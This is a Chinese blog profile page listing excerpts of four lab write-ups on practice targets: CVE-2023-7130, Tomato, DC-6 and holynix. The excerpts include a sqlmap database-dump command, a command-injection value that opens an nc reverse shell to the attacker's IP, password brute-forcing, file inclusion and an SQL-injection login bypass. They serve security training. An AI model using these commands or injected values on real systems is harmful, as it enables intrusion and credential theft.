自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 春秋云境CVE-2023-7130

python3 sqlmap.py -r 地址 -batch -dbs。进入界面有个登陆,我们直接登陆进去。复制post包,保存为1.txt。发送到repeater。发现进去就是报错注入。使用sqlmap爆破。

2024-09-25 18:49:01 422

原创 Tomato

信息收集获取ip扫描端口及服务扫描目录开始访问首页是一张图片server-status是一个目录antibot_image发现目录遍历漏洞里面发现了文件包含的命令,允许远程读取url文件,但是不允许包含url文件,可以进行利用尝试查看passwd文件、既然可以查看密码文件,那我们尝试查看一下其他文件查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索反弹shell。

2024-09-25 18:47:52 689

原创 DC-6靶机

将包改成 souhu.com|nc -e /bin/bash 192.168.221.128 4444。使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破。进入到/usr/share/wordlists下你会发现有一个rockyou.txt.gz。发现开放了80.22端口,访问一下http://192.168.221.151:80。发现一个http://192.168.221.151/wp-admin。将脚本修改一下,将/bin/bash写入脚本。

2024-09-25 18:46:54 1798

原创 holynix

输入以后直接报错,而且暴漏了sql查询语句,可以看到这个sql查询语句对username字段的单引号进行了转义,但是password没有,所以我们只要username随便输,password用万能密码登陆即可。这句话暴漏了两个信息1,文件上传之后的上传位置可能是用户的家目录,也就是/home/alamo,第二,alamo的权限不够,需要寻找更高权限的用户。读取失败了,出现报错,先不管,继续在左边的栏目看看又没有可以代码执行或文件上传的地方,最后在upload模块发现可以上传文件。

2024-09-25 18:45:47 876

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除